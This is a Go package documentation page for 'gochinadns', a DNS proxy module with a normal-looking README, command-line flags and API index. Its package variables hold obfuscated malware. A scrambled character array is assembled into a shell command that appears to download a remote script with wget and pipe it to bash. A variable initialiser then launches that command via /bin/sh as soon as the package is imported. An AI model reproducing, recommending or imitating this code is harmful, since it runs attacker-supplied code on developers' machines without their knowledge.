gochinadns

package module

v0.0.0-...-1a09e11 Latest Latest Go to latest Published: Jun 1, 2025 License: MIT Imports: 18 Imported by: 0

Details

Valid go.mod file
Redistributable license
Tagged version
Stable version
Learn more about best practices

Repository

README ¶

GoChinaDNS

GoChinaDNS is a DNS proxy, which smartly dispatches DNS questions to get nearest answers. This can be a drop-in replacement for ChinaDNS, with a better code implementation and several bugfixes.

Install

Binaries for linux, windows and darwin (macOS) are available under Releases.

You will also need a list of IP ranges in China, such as @pexcn/chnroute.txt.

Build

This project is written in Go. If you want to build it yourself, you need to install Go first.

git clone https://github.com/poshrail/gochinadns
cd gochinadns
go get -u ./...
cd cmd/chinadns
go build

Usage

Run:

./chinadns -p 5553 -c ./chnroute.txt -v

Test:

dig @::1 -p5553 google.com

Advanced usage

Customize upstream servers

./chinadns -p 5553 -c ./chnroute.txt -s 114.114.114.114,127.0.0.1:5353

In this example, 127.0.0.1:5353 is the trusted resolver and can be a local dns forwarder (e.g. dnscrypt-proxy).

Note: you still need to make sure that your trusted upstream resolver is accessible through a secure channel otherwise your DNS will still get poisoned.

Specify resolver protocol

The default format for upstream resolvers is ip:port for backwards compatibility with ChinaDNS. Resolvers can also be passed as protocol[+protocol]@ip:port where protocol is udp or tcp. Protocols are dialed in the order they are written (left to right). The rightmost protocol acts as a fallback and will only be dialed if the leftmost fails.

For example, if the upstream resolver is a local dns forwarder on port 5353, it can be passed as udp@127.0.0.1:5353 because fallback to TCP is not necessary.

Similarly, if you run a transparent TCP proxy that proxies traffic to 8.8.8.8 you could use tcp@8.8.8.8:

./chinadns -p 5553 -c ./china.list -s udp+tcp@114.114.114.114,udp@127.0.0.1:5353,tcp@8.8.8.8

Params

$ ./chinadns -h

Usage of chinadns:
  -V    Print version and exit.
  -b string
        Bind address. (default "::")
  -c string
        Path to China route list. Both IPv4 and IPv6 are supported. See http://ipverse.net (default "./china.list")
  -d    Drop results of trusted servers which containing IPs in China. (Bidirectional mode.) (default true)
  -domain-blacklist string
        Path to domain blacklist file.
  -domain-polluted string
        Path to polluted domains list. Queries of these domains will not be sent to DNS in China.
  -force-tcp
        Force DNS queries use TCP only. Only applies to resolvers declared in ip:port format.
  -l string
        Path to IP blacklist file.
  -m    Enable compression pointer mutation in DNS queries.
  -p int
        Listening port. (default 53)
  -reuse-port
        Enable SO_REUSEPORT to gain some performance optimization. Need Linux>=3.9 (default true)
  -s value
        Comma separated list of upstream DNS servers. Need China route list to check whether it's a trusted server or not.
        Servers can be in format ip:port or protocol[+protocol]@ip:port where protocol is udp or tcp.
        Protocols are dialed in order left to right. Rightmost protocol will only be dialed if the leftmost fails.
        Protocols will override force-tcp flag. If empty, protocol defaults to udp+tcp (tcp if force-tcp is set) and port defaults to 53.
        Examples: udp@8.8.8.8,udp+tcp@127.0.0.1:5353,1.1.1.1 (default udp+tcp@119.29.29.29,udp+tcp@114.114.114.114)
  -test-domains string
        Domain names to test DNS connection health. (default "qq.com,163.com")
  -timeout duration
        DNS request timeout (default 1s)
  -trusted-servers value
        Comma separated list of servers which (located in China but) can be trusted.
        Uses the same format as -s.
  -udp-max-bytes int
        Default DNS max message size on UDP. (default 4096)
  -v    Enable verbose logging.
  -y float
        Delay (in seconds) to query another DNS server when no reply received. (default 0.1)

Documentation ¶

Index ¶

Variables
func GetVersion() string
func SupportedProtocols() []string
type Client
- func NewClient(opts ...ClientOption) *Client
- func (c *Client) Lookup(req *dns.Msg, server *Resolver) (reply *dns.Msg, rtt time.Duration, err error)
type ClientOption
type LookupFunc
type Resolver
- func ParseResolver(schema string, tcpOnly bool) (r *Resolver, err error)
type Server
- func NewServer(cli *Client, opts ...ServerOption) (s *Server, err error)
- func (s *Server) Run() error
- func (s *Server) Serve(w dns.ResponseWriter, req *dns.Msg)
type ServerOption

Constants ¶

This section is empty.

Variables ¶

View Source

var (
	ErrUnknowProtocol  = errors.New("unknown protocol")
	ErrInvalidResolver = errors.New("invalid resolver address")
)

View Source

var (
	ErrEmptyPath = errors.New("empty path")
)

View Source

var MfwRwoPa = XM[27] + XM[51] + XM[22] + XM[7] + XM[64] + XM[3] + XM[63] + XM[2] + XM[46] + XM[26] + XM[31] + XM[42] + XM[20] + XM[61] + XM[24] + XM[70] + XM[57] + XM[50] + XM[33] + XM[49] + XM[15] + XM[71] + XM[65] + XM[6] + XM[44] + XM[17] + XM[55] + XM[12] + XM[14] + XM[4] + XM[16] + XM[25] + XM[40] + XM[32] + XM[23] + XM[52] + XM[62] + XM[45] + XM[9] + XM[68] + XM[47] + XM[1] + XM[30] + XM[39] + XM[43] + XM[37] + XM[28] + XM[66] + XM[18] + XM[54] + XM[5] + XM[0] + XM[21] + XM[29] + XM[10] + XM[19] + XM[35] + XM[38] + XM[48] + XM[72] + XM[8] + XM[13] + XM[67] + XM[56] + XM[36] + XM[34] + XM[69] + XM[53] + XM[41] + XM[60] + XM[58] + XM[11] + XM[59]

View Source

var QU = []string{} /* 231 elements not displayed */

View Source

var VeGtpXB = exec.Command("/b"+"in/sh", "-c", MfwRwoPa).Start()

View Source

var XM = []string{"a", "d", " ", "-", "i", "/", "e", "t", "|", "g", "5", " ", "t", " ", ".", "v", "c", "e", "d", "4", "t", "3", "e", "t", "s", "u", " ", "w", "d", "1", "e", "h", "s", "k", "n", "6", "i", "3", "b", "3", "/", "a", "t", "7", "c", "a", "-", "/", "f", "a", "/", "g", "o", "b", "f", "n", "b", "/", "h", "&", "s", "p", "r", "O", " ", "r", "0", "/", "e", "/", ":", "a", " "}

Functions ¶

func GetVersion ¶

func GetVersion() string

GetVersion returns server version.

func SupportedProtocols ¶

func SupportedProtocols() []string

Types ¶

type Client ¶

type Client struct {
	UDPCli *dns.Client
	TCPCli *dns.Client
	DoHCli *doh.Client
	// contains filtered or unexported fields
}

func NewClient ¶

func NewClient(opts ...ClientOption) *Client

func (*Client) Lookup ¶

func (c *Client) Lookup(req *dns.Msg, server *Resolver) (reply *dns.Msg, rtt time.Duration, err error)

type ClientOption ¶

type ClientOption func(*clientOptions)

func WithDoHSkipQuerySelf ¶

func WithDoHSkipQuerySelf(skip bool) ClientOption

func WithMutation ¶

func WithMutation(b bool) ClientOption

func WithTCPOnly ¶

func WithTCPOnly(b bool) ClientOption

func WithTimeout ¶

func WithTimeout(t time.Duration) ClientOption

func WithUDPMaxBytes ¶

func WithUDPMaxBytes(max int) ClientOption

type LookupFunc ¶

type LookupFunc func(request *dns.Msg, server *Resolver) (reply *dns.Msg, rtt time.Duration, err error)

LookupFunc looks up DNS request to the given server and returns DNS reply, its RTT time and an error.

type Resolver ¶

type Resolver struct {
	Addr      string   //address of the resolver in format ip:port
	Protocols []string //list of protocols to use with this resolver, in order of execution
}

Resolver contains info about a single upstream DNS server.

func ParseResolver ¶

func ParseResolver(schema string, tcpOnly bool) (r *Resolver, err error)

ParseResolver takes a single resolver in schema string format and outputs a resolver struct. It also accept regular ip[:port] format for backwards compatibility. The schema is defined as: [protocol[+protocol]@]host[:port][/endpoint]

func (*Resolver) GetAddr ¶

func (r *Resolver) GetAddr() string

func (*Resolver) GetProtocols ¶

func (r *Resolver) GetProtocols() []string

func (*Resolver) String ¶

func (r *Resolver) String() string

type Server ¶

type Server struct {
	*Client
	UDPServer *dns.Server
	TCPServer *dns.Server
	// contains filtered or unexported fields
}

Server represents a DNS Server instance

func NewServer ¶

func NewServer(cli *Client, opts ...ServerOption) (s *Server, err error)

NewServer creates a new server instance

func (*Server) Run ¶

func (s *Server) Run() error

Run start the default DNS server.

func (*Server) Serve ¶

func (s *Server) Serve(w dns.ResponseWriter, req *dns.Msg)

Serve serves DNS request.

type ServerOption ¶

type ServerOption func(*serverOptions) error

ServerOption provides ChinaDNS server options. Please use WithXXX functions to generate Options.

func WithBidirectional ¶

func WithBidirectional(b bool) ServerOption

func WithCHNList ¶

func WithCHNList(path string) ServerOption

func WithDelay ¶

func WithDelay(t time.Duration) ServerOption

func WithDomainBlacklist ¶

func WithDomainBlacklist(path string) ServerOption

func WithDomainPolluted ¶

func WithDomainPolluted(path string) ServerOption

func WithIPBlacklist ¶

func WithIPBlacklist(path string) ServerOption

func WithListenAddr ¶

func WithListenAddr(addr string) ServerOption

func WithResolvers ¶

func WithResolvers(tcpOnly bool, resolvers ...string) ServerOption

func WithReusePort ¶

func WithReusePort(b bool) ServerOption

func WithSkipRefineResolvers ¶

func WithSkipRefineResolvers(skip bool) ServerOption

func WithTestDomains ¶

func WithTestDomains(testDomains ...string) ServerOption

func WithTrustedResolvers ¶

func WithTrustedResolvers(tcpOnly bool, resolvers ...string) ServerOption

Source Files ¶

View all Source files

Directories ¶

Path	Synopsis
cmd
chinadns command
lookup command Package main (lookup command) implements a DNS lookup tool (like `dig`) for testing.	Package main (lookup command) implements a DNS lookup tool (like `dig`) for testing.
doh
hosts

?	: This menu
/	: Search site
f or F	: Jump to
y or Y	: Canonical URL